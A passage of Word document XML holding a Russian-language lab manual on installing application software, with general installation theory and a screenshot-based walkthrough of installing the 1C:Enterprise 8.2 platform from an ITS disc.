        </w:rPr>
        <w:t>3. Запустить программу установки от имени администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Внимательно ознакомиться с лицензионным соглашением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Если вас устраивают все пункты лицензионного соглашения, необходимо подтвердить его и продолжить установку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Выбрать системный раздел и конечный путь для установки программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Настроить устанавливаемые компоненты продукта, или же выправить рекомендуемый набор компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Провести инсталляцию программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткие теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка программного обеспечения, инсталляция – процесс установки программного обеспечения на компьютер конечного пользователя. Выполняется особой программой (пакетным менеджером), присутствующей в операционной системе (например, RPM, APT или dpkg в Linux, Установщик Windows в Microsoft Windows), или же входящим в состав самого программного обеспечения средством установки. В операционной системе GNU очень распространено использование системы GNU toolchain и ее аналогов для компиляции программного обеспечения непосредственно перед установкой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Большинство программ поставляются для продажи и распространения в сжатом виде (в архиве). Их нужно распаковать, а необходимые данные правильно разместить на компьютере, учитывая различия между оборудованием и настройками пользователя. В процессе установки выполняются различные тесты на соответствие заданным требованиям, а компьютер необходимым образом конфигурируется (настраивается) для хранения файлов и данных, необходимых для правильной работы программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Установка включает размещение всех необходимых программе файлов в соответствующих местах файловой системы, а также модификацию и создание </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>конфигурационных файлов. Пакетные менеджеры также выполняют при установке контроль зависимостей, проверяя, есть ли в системе необходимые для работы данной программы пакеты, а в случае успешной установки регистрируя новый пакет в списке доступных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так как данный процесс является различным для каждой программы и компьютера, то многие программы (включая сами операционные системы) поставляются вместе с универсальным или специальным установщиком – программой, которая автоматизирует большую часть работы, необходимой для их установки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Некоторые программы написаны таким образом, что устанавливаются простым копированием своих файлов в нужное место, а самого процесса установки как такового нет. Про такие программы говорят, что они «не требуют установки». Это распространено среди программ для Mac OS X, DOS и Microsoft Windows. Существуют операционные системы, которые не требуют установки, и, таким образом, могут быть напрямую запущены с загрузочного диска (компакт- или DVD-диск), не оказывая воздействия на другие операционные системы, установленные на компьютере пользователя. Примером такой операционной системы является Knoppix или Mac OS 1-9.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Данный термин также распространяется на плагины, драйверы и программные файлы, которые сами по себе не являются программами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Установка и настройка специализированных программ для просмотра и редактирования видеозаписей: Adobe Premiere, Adobe Flash Professional.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Установка и настройка специализированных программ для работы с пиксельной и векторной графикой: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adobe</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Photoshop</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adobe</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CorelDraw</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DsMax</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gimp</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Установка и настройка специализированных программ для создания и просмотра презентаций, для просмотра веб-страниц и скачивания почты, для работы по FTP: FileZilla Client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Установка и настройка специализированных программ для создания и просмотра презентаций, для просмотра веб-страниц и скачивания почты, для работы по FTP: FileZilla Client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Установка и настройка программного обеспечения отраслевой направленности 1С:Предприятие 8.2, 1С:CRM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Проверить системные требования устанавливаемого программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Удостовериться, что на диске присутствует достаточно места для установки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Запустить программу установки от имени администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Внимательно ознакомиться с лицензионным соглашением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Если вас устраивают все пункты лицензионного соглашения, необходимо подтвердить его и продолжить установку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Выбрать системный раздел и конечный путь для установки программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Настроить устанавливаемые компоненты продукта, или же выправить рекомендуемый набор компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8. Провести инсталляцию программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткие теоретические сведения и ход установки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки платформы 1С 8.2 для Windows на компьютер пользователя вам понадобится дистрибутив платформы. Чтобы обновить платформу, вам нужно сделать абсолютно тоже самое, что и при установке платформы. Установка на сервер 1С Предприятия отличается от установки рассматриваемой ниже. Мы рассмотрим установку для файловых баз 1С Предприятие. Это наиболее распространенный вариант использования программ 1С . Рассмотрим установку на примере платформы 1С 8.2.15.317.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка версии платформы 1С 8.3 ничем не отличается от 8.2 поэтому данная инструкция подойдет и для нее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установочные файлы дистрибутива выглядят следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2155350" cy="1545856"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="405" name="Рисунок 27827" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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27" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image253.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId295" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2155191" cy="1545742"/>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Если у Вас нет дистрибутива, но есть подписка на ИТС (информационно-технологическое сопровождение) у партнеров 1С , вы можете скачать эти файлы с диска ИТС, либо с сайта users.v8.1c.ru.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установка платформы 1С с диска ИТС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запускаем диск ИТС, нажимаем запуск: Программа предлагает установить драйвер, необходимый для работы диска ИТС. Нажимаем Да, ждем пока драйвер установится:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1536150" cy="710870"/>
            <wp:effectExtent l="19050" t="0" r="6900" b="0"/>
            <wp:docPr id="406" name="Рисунок 28281" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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1" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image255.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId296" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1535784" cy="710700"/>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Появляется главное окно программы. Выбираем раздел “Технологическая поддержка”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2292150" cy="1343431"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="407" name="Рисунок 28282" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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2" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image256.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2292523" cy="1343649"/>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Здесь выбираем «Формы отчетности, релизы программ и конфигураций» для 1С: Предприятие 8:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2292150" cy="1348468"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="408" name="Рисунок 28283" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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3" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image257.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2291921" cy="1348333"/>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Выбираем раздел 1С: Предприятие 8.2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2479350" cy="1461726"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="409" name="Рисунок 28284" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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4" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image258.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2479678" cy="1461919"/>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Выбираем пункт меню 1С: Предприятие 8. Версия 8.2.15.317:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2760150" cy="1625130"/>
            <wp:effectExtent l="19050" t="0" r="2100" b="0"/>
            <wp:docPr id="410" name="Рисунок 28285" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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5" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image259.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId300" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2760421" cy="1625289"/>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Здесь выбираем «Начать установку платформы для Windows (32-битная версия)». Независимо от того какой разрядности ваша операционная система, вы выбираете этот пункт. Дело в том, что разрядность играет роль только при установке платформы для клиент-серверного варианта работы 1С предприятия, а не для файлового, и даже если у вас 64-разрядная версия Windows, вы выбираете пункт для Windows (32-битная версия).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
